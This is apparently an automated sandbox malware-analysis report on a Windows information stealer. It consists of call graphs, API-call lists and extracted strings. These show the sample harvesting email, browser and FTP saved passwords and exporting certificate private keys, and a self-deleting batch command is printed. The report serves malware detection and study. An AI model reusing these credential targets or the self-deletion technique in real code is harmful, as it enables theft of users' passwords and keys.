6 API calls 10586->10588 10587->10586 10589 408bba StrStrIA 10588->10589 10590 408bd5 10589->10590 10591 408be8 10589->10591 10592 408961 38 API calls 10590->10592 10593 4018b8 LocalFree 10591->10593 10592->10591 10593->10582 10680 401eb1 7 API calls 10679->10680 10681 405328 10680->10681 10682 4053bf 10681->10682 10683 401df8 5 API calls 10681->10683 10682->8989 10684 405340 10683->10684 10685 4051e3 29 API calls 10684->10685 10686 40534f 10685->10686 10687 4018b8 LocalFree 10686->10687 10688 405354 10687->10688 10689 401df8 5 API calls 10688->10689 10690 405361 10689->10690 10691 4051e3 29 API calls 10690->10691 10692 405370 10691->10692 10693 4018b8 LocalFree 10692->10693 10694 405375 10693->10694 10695 401df8 5 API calls 10694->10695 10709 401d71 6 API calls 10708->10709 10711 4051bd 10709->10711 10710 4051df 10710->8999 10711->10710 10712 4018b8 LocalFree 10711->10712 
10712->10710 10714 4051fd 10713->10714 10715 405202 10713->10715 10714->10715 10717 401df8 5 API calls 10714->10717 10716 4018b8 LocalFree 10715->10716 10718 405316 10716->10718 10719 405212 10717->10719 10718->8986 10737 405182 10719->10737 10722 4018b8 LocalFree 10723 405221 10722->10723 10724 401df8 5 API calls 10723->10724 10725 40522e 10724->10725 10726 405245 FindFirstFileA 10725->10726 10726->10715 10727 405264 10726->10727 10728 405272 lstrcmpiA 10727->10728 10729 4052e6 FindNextFileA 10727->10729 10731 40528c lstrcmpiA 10728->10731 10735 40528a 10728->10735 10729->10727 10730 405300 FindClose 10729->10730 10730->10715 10731->10735 10732 401df8 5 API calls 10732->10735 10733 401e4c 6 API calls 10733->10735 10734 405182 16 API calls 10734->10735 10735->10729 10735->10732 10735->10733 10735->10734 10736 4018b8 LocalFree 10735->10736 10736->10729 10738 40406c 16 API calls 10737->10738 10739 405195 10738->10739 10739->10722 10741 40f717 10740->10741 10742 40f6fd 10740->10742 10744 40f30d RegOpenKeyA 10741->10744 10742->10741 10764 40a45e 10742->10764 10745 40f3a8 10744->10745 10746 40f329 10744->10746 10745->9025 10747 40f330 RegEnumKeyExA 10746->10747 10750 401df8 5 API calls 10746->10750 10751 401e4c 6 API calls 10746->10751 10753 4018b8 LocalFree 10746->10753 10777 40f178 10746->10777 10747->10746 10748 40f359 RegCloseKey 10747->10748 10748->10745 10750->10746 10751->10746 10753->10746 10755 40f452 10754->10755 10761 40f3cc 10754->10761 10755->9029 10756 40f3d3 RegEnumKeyExA 10757 40f3fc RegCloseKey 10756->10757 10756->10761 10757->10755 10759 401df8 5 API calls 10759->10761 10760 401e4c 6 API calls 10760->10761 10761->10756 10761->10759 10761->10760 10762 40f30d 23 API calls 10761->10762 10763 4018b8 LocalFree 10761->10763 10762->10761 10763->10761 10767 40a47e 10764->10767 10765 40a4d3 10765->10741 10767->10765 10768 40a3c8 10767->10768 10770 40a3eb 10768->10770 10769 40a448 10769->10767 10770->10769 10772 40a342 10770->10772 10773 40a34f 10772->10773 
                                                Control-flow Graph

                                                APIs
                                                • GetTickCount.KERNEL32 ref: 00410092
                                                • wsprintfA.USER32 ref: 004100A0
                                                • GetModuleFileNameA.KERNEL32(?,00000104,00000105,00000105,00000105,?,00000105,00410079), ref: 00410100
                                                • GetTempPathA.KERNEL32(00000104,?,?,00000104,00000105,00000105,00000105,?,00000105,00410079), ref: 00410116
                                                • lstrcat.KERNEL32(?,?), ref: 0041012A
                                                • ExitProcess.KERNEL32(?,C0000000,00000003,00000000,00000002,00000000,00000000,00000104,?,?,00000104,00000105,00000105,00000105,?,00000105), ref: 00410143
                                                • lstrcpy.KERNEL32(?,?), ref: 0041015A
                                                • StrRChrIA.SHLWAPI(?,00000000,0000005C,?,?,?,C0000000,00000003,00000000,00000002,00000000,00000000,00000104,?,?,00000104), ref: 00410166
                                                • lstrcpy.KERNEL32(00000001,?), ref: 00410174
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: lstrcpy$CountExitFileModuleNamePathProcessTempTicklstrcatwsprintf
                                                • String ID: :ktk del %1 if exist %1 goto ktk del %0 $ "%s" $%d.bat$ShellExecuteA$open$shell32.dll
                                                • API String ID: 629621046-4169620016
                                                • Opcode ID: 51fe474169a1c61bec2a245e5406ea64e237c4c59cb211578291ded0f9fd4f68
                                                • Instruction ID: d87f7c95a24b28c2337a621791b8d5a4a1afbdb6f7934d1f864dba4089bdb773
                                                • Opcode Fuzzy Hash: 51fe474169a1c61bec2a245e5406ea64e237c4c59cb211578291ded0f9fd4f68
                                                • Instruction Fuzzy Hash: C5413030B542057ADF1576A18C03FEE7AA7AB85704F24843A7614F62E1EEF94DD05A1C

                                                Control-flow Graph

                                                APIs
                                                • RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040EBB6
                                                • RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040EBEA
                                                • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040EEA5
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseEnumOpen
                                                • String ID: EmailAddress$PopAccount$PopPassword$PopPort$PopServer$SmtpAccount$SmtpPassword$SmtpPort$SmtpServer$Technology
                                                • API String ID: 1332880857-2111798378
                                                • Opcode ID: 3e868bbcc0dd9ada4210e77e52b4ab6d2948a5b27e69a32f849be68ab5541d54
                                                • Instruction ID: e2a117a2fde9dc82a56ede7dd39e4504eb823868495590e5bf7fc199db2764f0
                                                • Opcode Fuzzy Hash: 3e868bbcc0dd9ada4210e77e52b4ab6d2948a5b27e69a32f849be68ab5541d54
                                                • Instruction Fuzzy Hash: E871A23194011CAADF226F51CC02FEDBAB6FF04704F1485BAB558740B1DB7A5BA1AF88

                                                Control-flow Graph

                                                APIs
                                                • CertOpenSystemStoreA.CRYPT32(00000000,00416871), ref: 0040D444
                                                • CertEnumCertificatesInStore.CRYPT32(00000000), ref: 0040D45D
                                                • lstrcmp.KERNEL32(?,2.5.29.37), ref: 0040D48E
                                                  • Part of subcall function 004018CF: LocalAlloc.KERNEL32(00000040,0040242B,?,004024AB,?), ref: 004018DD
                                                • lstrcmp.KERNEL32(?,0041687E), ref: 0040D4C6
                                                • CryptAcquireCertificatePrivateKey.CRYPT32(00000000,00000000,00000000,?,?,00000000), ref: 0040D4E2
                                                • CryptGetUserKey.ADVAPI32(?,?,?), ref: 0040D4FA
                                                • CryptExportKey.ADVAPI32(?,00000000,00000007,00000000,00000000,?), ref: 0040D513
                                                • CryptExportKey.ADVAPI32(?,00000000,00000007,00000000,?,?,?), ref: 0040D538
                                                • CryptDestroyKey.ADVAPI32(?), ref: 0040D576
                                                • CryptReleaseContext.ADVAPI32(?,00000000), ref: 0040D581
                                                • CertCloseStore.CRYPT32(00000000,00000000), ref: 0040D5A9
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Crypt$CertStore$Exportlstrcmp$AcquireAllocCertificateCertificatesCloseContextDestroyEnumLocalOpenPrivateReleaseSystemUser
                                                • String ID: 2.5.29.37
                                                • API String ID: 2649496969-3842544949
                                                • Opcode ID: 637e0f19b02e3674b6d4283a020c02448b0706c218f3461ba57614afaf236d84
                                                • Instruction ID: 69ea86f0ab44da64ba056d6111593992adadb32ff072f1572f9399bad78f7f88
                                                • Opcode Fuzzy Hash: 637e0f19b02e3674b6d4283a020c02448b0706c218f3461ba57614afaf236d84
                                                • Instruction Fuzzy Hash: 9A512931900205FBDF21AB94DC09BEEBB71BF44745F148436BA01761F0D779AA94DB98

                                                Control-flow Graph

                                                APIs
                                                • FindFirstFileA.KERNEL32(00000000,?), ref: 00404EE3
                                                • lstrcmpiA.KERNEL32(00414F84,?), ref: 00404F0C
                                                • lstrcmpiA.KERNEL32(00414F86,?), ref: 00404F29
                                                • FindNextFileA.KERNEL32(?,?,?,.ini,00000000,?), ref: 00404FD8
                                                • FindClose.KERNEL32(?,?,?,?,.ini,00000000,?), ref: 00404FEB
                                                  • Part of subcall function 00401DF8: lstrlen.KERNEL32(?), ref: 00401E19
                                                  • Part of subcall function 00401DF8: lstrlen.KERNEL32(00000000,?), ref: 00401E23
                                                  • Part of subcall function 00401DF8: lstrcpy.KERNEL32(00000000,?), ref: 00401E37
                                                  • Part of subcall function 00401DF8: lstrcat.KERNEL32(00000000,00000000), ref: 00401E40
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Find$Filelstrcmpilstrlen$CloseFirstNextlstrcatlstrcpy
                                                • String ID: *.*$.ini$Sites\$\*.*
                                                • API String ID: 3040542784-999409347
                                                • Opcode ID: 14502acd3d041963e3dba50669f6717ad26e31770b4fbd5e5981e1a2cdc20703
                                                • Instruction ID: 4ebe6fddfcda91dad50fc3424f79042eee35b7dd55d742c6c8e7d1074e8a7db5
                                                • Opcode Fuzzy Hash: 14502acd3d041963e3dba50669f6717ad26e31770b4fbd5e5981e1a2cdc20703
                                                • Instruction Fuzzy Hash: 763166B090020AAADF11BF61CC42FEE77A9AF80304F1045B7B518B51E1D77C9EC19E59

                                                Control-flow Graph

                                                APIs
                                                • GetVersionExA.KERNEL32(0000009C), ref: 00404646
                                                • GetLocaleInfoA.KERNEL32(00000400,00001002,?,000003FF,00000400,0000009C), ref: 004046CB
                                                • GetLocaleInfoA.KERNEL32(00000400,00001001,?,000003FF,00000400,00001002,?,000003FF,00000400,0000009C), ref: 004046F4
                                                • GetModuleHandleA.KERNEL32(kernel32.dll,?,00000000,00000400,00001001,?,000003FF,00000400,00001002,?,000003FF,00000400,0000009C), ref: 004047A9
                                                • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 004047C8
                                                • GetNativeSystemInfo.KERNEL32(?,00000000,GetNativeSystemInfo,kernel32.dll,?,00000000,00000400,00001001,?,000003FF,00000400,00001002,?,000003FF,00000400,0000009C), ref: 004047D8
                                                • GetSystemInfo.KERNEL32(?,kernel32.dll,?,00000000,00000400,00001001,?,000003FF,00000400,00001002,?,000003FF,00000400,0000009C), ref: 004047E6
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Info$LocaleSystem$AddressHandleModuleNativeProcVersion
                                                • String ID: GetNativeSystemInfo$HWID$kernel32.dll
                                                • API String ID: 1787888500-92997708
                                                • Opcode ID: 376afeabaa00fbbc2dd62934deefa5e6c798daae43d80496e7cd973b26a25388
                                                • Instruction ID: db48739d82feba77cf0cee32c0e06214f71ac3aef5999eac4331223504f8986d
                                                • Opcode Fuzzy Hash: 376afeabaa00fbbc2dd62934deefa5e6c798daae43d80496e7cd973b26a25388
                                                • Instruction Fuzzy Hash: 55518471A00218BEEF217B61CC42F9D7A35AF81308F0040BBB649790E1D7B95ED59F5A
                                                APIs
                                                • FindFirstFileA.KERNEL32(00000000,?), ref: 00408B3A
                                                • lstrcmpiA.KERNEL32(00414F84,?), ref: 00408B6D
                                                • lstrcmpiA.KERNEL32(00414F86,?), ref: 00408B87
                                                • StrStrIA.SHLWAPI(?,opera,00000000,00414F86,?,00414F84,?,00000000,?), ref: 00408BCC
                                                • FindNextFileA.KERNEL32(?,?,00000000,?), ref: 00408BFA
                                                • FindClose.KERNEL32(?,?,?,00000000,?), ref: 00408C0D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Find$Filelstrcmpi$CloseFirstNext
                                                • String ID: \*.*$opera$wand.dat
                                                • API String ID: 3663067366-3278183560
                                                • Opcode ID: a6871aa7f1e592626901312b665b43d8589c5a46e070cd754d38877e57c56036
                                                • Instruction ID: e5ee878ad4cec5bad4980fd33fa9531b0e4dcb501f0c88bdaa15308997453479
                                                • Opcode Fuzzy Hash: a6871aa7f1e592626901312b665b43d8589c5a46e070cd754d38877e57c56036
                                                • Instruction Fuzzy Hash: 88311E7090021D9ADB60AB51CD42AE977B5AB44304F0041BBB548B91E1DB78AEC19F58
                                                APIs
                                                • FindFirstFileA.KERNEL32(00000000,?), ref: 00404216
                                                • lstrcmpiA.KERNEL32(00414F84,?), ref: 00404243
                                                • lstrcmpiA.KERNEL32(00414F86,?), ref: 00404260
                                                • FindNextFileA.KERNEL32(?,?,?,00000000,00000000,?), ref: 0040432A
                                                • FindClose.KERNEL32(?,?,?,?,00000000,00000000,?), ref: 0040433D
                                                  • Part of subcall function 00401DF8: lstrlen.KERNEL32(?), ref: 00401E19
                                                  • Part of subcall function 00401DF8: lstrlen.KERNEL32(00000000,?), ref: 00401E23
                                                  • Part of subcall function 00401DF8: lstrcpy.KERNEL32(00000000,?), ref: 00401E37
                                                  • Part of subcall function 00401DF8: lstrcat.KERNEL32(00000000,00000000), ref: 00401E40
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Find$Filelstrcmpilstrlen$CloseFirstNextlstrcatlstrcpy
                                                • String ID: *.*$\*.*
                                                • API String ID: 3040542784-1692270452
                                                • Opcode ID: bf123e613532cfffce1055e4d4c5b52597834ca5d941327fb15707ae3e25d38e
                                                • Instruction ID: 5e5cf996161199591b6a28a4ff005dbab79564ec832c2e4b7604db23a3f30ec1
                                                • Opcode Fuzzy Hash: bf123e613532cfffce1055e4d4c5b52597834ca5d941327fb15707ae3e25d38e
                                                • Instruction Fuzzy Hash: B44160B0600219AADF11AF61CC06AEE3B69AF84344F1041BBBA18750F1D7789AD1AE59
                                                APIs
                                                • lstrlenW.KERNEL32(?), ref: 0040A71C
                                                • wsprintfA.USER32 ref: 0040A79B
                                                • lstrlenW.KERNEL32(?,?), ref: 0040A7E1
                                                • CryptUnprotectData.CRYPT32(00000000,00000000,?,00000000,00000000,00000001,?), ref: 0040A824
                                                • LocalFree.KERNEL32(00000000), ref: 0040A85B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: lstrlen$CryptDataFreeLocalUnprotectwsprintf
                                                • String ID: %02X$Software\Microsoft\Internet Explorer\IntelliForms\Storage2
                                                • API String ID: 1926481713-2450551051
                                                • Opcode ID: 6647c7f13e3975a35e780e360fbebd88ab62ad7df247ec204a1b0914c87d8627
                                                • Instruction ID: 7cec4ba5f278735bef2daa032c3da861db9c271a8c642e1c0fec04d74f03301a
                                                • Opcode Fuzzy Hash: 6647c7f13e3975a35e780e360fbebd88ab62ad7df247ec204a1b0914c87d8627
                                                • Instruction Fuzzy Hash: 5A414D72C1021CEADF11AFA1DC01AEDBB79FF04314F14803AF911B61A1D7799A51CB59
                                                APIs
                                                • FindFirstFileA.KERNEL32(00000000,?,00000000), ref: 00405252
                                                • lstrcmpiA.KERNEL32(00414F84,?), ref: 00405281
                                                • lstrcmpiA.KERNEL32(00414F86,?), ref: 0040529B
                                                • FindNextFileA.KERNEL32(?,?,00000000,?,00000000), ref: 004052F3
                                                • FindClose.KERNEL32(?,?,?,00000000,?,00000000), ref: 00405306
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Find$Filelstrcmpi$CloseFirstNext
                                                • String ID: \*.*
                                                • API String ID: 3663067366-1173974218
                                                • Opcode ID: 0500d5f00ee0813dee801a9d420df7e45fb42e5a10b01476559d917fb3a5a69f
                                                • Instruction ID: 4170e0cdbb32cde0fb555d52f6b502d03a9112cbff49fd029bea05776b430742
                                                • Opcode Fuzzy Hash: 0500d5f00ee0813dee801a9d420df7e45fb42e5a10b01476559d917fb3a5a69f
                                                • Instruction Fuzzy Hash: 18312D7190021AAADF21AB61CC42AEE77A9EF00314F0045BAF818B51E2D7789BD19F59
                                                APIs
                                                • CoCreateInstance.OLE32(004162BF,00000000,00000005,004162CF,?), ref: 0040A88D
                                                • StrStrIW.SHLWAPI(00000000,004162EF), ref: 0040A904
                                                • CoTaskMemFree.OLE32(00000000,00000000,004162EF), ref: 0040A92F
                                                • CoTaskMemFree.OLE32(00000000,00000000,00000000,004162EF), ref: 0040A93D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: FreeTask$CreateInstance
                                                • String ID: ($http://www.facebook.com/
                                                • API String ID: 2903366249-3677894361
                                                • Opcode ID: e4386c61c5d52dae3f91afb7c524ba0f41b393633d994220be84190847cd43a6
                                                • Instruction ID: fb31eb5c0df78cdbf00d2063a309b2630a064c869b031c3f749717a331f3c059
                                                • Opcode Fuzzy Hash: e4386c61c5d52dae3f91afb7c524ba0f41b393633d994220be84190847cd43a6
                                                • Instruction Fuzzy Hash: 5D312A70A00209EBDF119F94C889FDEFB75BF44314F208566E40076290D3799E95DB59
                                                APIs
                                                • LookupPrivilegeValueA.ADVAPI32(00000000,?,?), ref: 004029A3
                                                • GetCurrentProcess.KERNEL32 ref: 004029AD
                                                • OpenProcessToken.ADVAPI32(00000000,00000020,00000000), ref: 004029BB
                                                • AdjustTokenPrivileges.KERNELBASE(00000000,00000000,?,00000010,00000000,00000000), ref: 004029FD
                                                • CloseHandle.KERNEL32(00000000), ref: 00402A11
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ProcessToken$AdjustCloseCurrentHandleLookupOpenPrivilegePrivilegesValue
                                                • String ID:
                                                • API String ID: 3038321057-0
                                                • Opcode ID: fc9f9e775449fdf1cf86c9df712af2ede95f219a55d47c9d5b092a3d41e4426a
                                                • Instruction ID: e5dea28dedcf19f79be4c8bfd698f998e52e89be124952076ce29543bc0c9a4f
                                                • Opcode Fuzzy Hash: fc9f9e775449fdf1cf86c9df712af2ede95f219a55d47c9d5b092a3d41e4426a
                                                • Instruction Fuzzy Hash: 1A111CB1A04209EFEF218F95DD49BEEB7B4BB40319F148136A151B41D0D7F89684CF19
                                                APIs
                                                • OleInitialize.OLE32 ref: 0041051E
                                                • GetUserNameA.ADVAPI32(?,00000101), ref: 0041056E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: InitializeNameUser
                                                • String ID: 4225
                                                • API String ID: 2272643758-3256947014
                                                • Opcode ID: 85497f2bdb01d2529f6a018abb02cef2ef2c8c3cf164c0ec7a06705425c62149
                                                • Instruction ID: f8a90d01b74eef74cfed5de9fe492a059dec9afd9cac863eb884a77ae8a26fbd
                                                • Opcode Fuzzy Hash: 85497f2bdb01d2529f6a018abb02cef2ef2c8c3cf164c0ec7a06705425c62149
                                                • Instruction Fuzzy Hash: 1FF0FE74654209ADDB20BBB2DD076DD3AA65B0030CF14443BB918F11E2DAFD45C4EA2D
                                                APIs
                                                • SetUnhandledExceptionFilter.KERNEL32 ref: 004105D6
                                                • RevertToSelf.ADVAPI32 ref: 00410601
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ExceptionFilterRevertSelfUnhandled
                                                • String ID:
                                                • API String ID: 669012916-0
                                                • Opcode ID: cb76501a8b5efdf40eeb47ef9fa0f3767e36d88dbf6e333e52206afbcd3a8f02
                                                • Instruction ID: 497a937cfd444ccb75a01f451d1fff2a03657cb5d6782b497a70bab0a2736278
                                                • Opcode Fuzzy Hash: cb76501a8b5efdf40eeb47ef9fa0f3767e36d88dbf6e333e52206afbcd3a8f02
                                                • Instruction Fuzzy Hash: 92D067744451498AD6757BF6A80A7DC3651ABC430EF40843FA401109A7CEFD24D8CD2F
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 91ce3f8c0f1bd09a143b1812374b0f813c50b60ad23a99001a06984c0b8e56f8
                                                • Instruction ID: d83f140231b2433478d0a28666096bc940b33525d9759782800d4ca776c3ccd3
                                                • Opcode Fuzzy Hash: 91ce3f8c0f1bd09a143b1812374b0f813c50b60ad23a99001a06984c0b8e56f8
                                                • Instruction Fuzzy Hash: EB110471608244FFDB214B59CC06F953F74E701B50F144037F80A629E2C33D4995EA4A

                                                Control-flow Graph

                                                APIs
                                                • RegOpenKeyA.ADVAPI32(?,?), ref: 00405A44
                                                • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00405A74
                                                • RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00405AC2
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseEnumOpen
                                                • String ID: Host$Last Server Host$Last Server Pass$Last Server Path$Last Server Port$Last Server Type$Last Server User$Pass$Path$Port$Remote Dir$Server Type$Server.Host$Server.Pass$Server.Port$Server.User$ServerType$User
                                                • API String ID: 1332880857-44262141
                                                • Opcode ID: e976e2a34d5e340282ec8372c36bf609406961023f5be640681139a220b80d6e
                                                • Instruction ID: ef9fb06cd34c7ccf76aa40754f09ac5043f5b2b84b8ceac9111509753786a159
                                                • Opcode Fuzzy Hash: e976e2a34d5e340282ec8372c36bf609406961023f5be640681139a220b80d6e
                                                • Instruction Fuzzy Hash: 51218131640A08FADF11AB50CC02FDD3B75AB84B05F20C167B515740E1DABD5AD0AF8C

                                                Control-flow Graph

                                                APIs
                                                • RegOpenKeyA.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,?), ref: 00402126
                                                • RegEnumKeyExA.ADVAPI32(?,00000000,?,00000FFF,00000000,00000000,00000000,00000000), ref: 00402166
                                                • lstrlen.KERNEL32(?,00000000,00000000,00000000,?,00000000,?,00000FFF,00000000,00000000,00000000,00000000,?,00000000,?,00000FFF), ref: 00402219
                                                • lstrlen.KERNEL32(?,00000000,?,00000000,?,00000FFF,00000000,00000000,00000000,00000000,?,00000000,?,00000FFF,00000000,00000000), ref: 00402252
                                                  • Part of subcall function 004018B8: LocalFree.KERNEL32(00000000,?,004024D2,?,?,?,?,?,?), ref: 004018C4
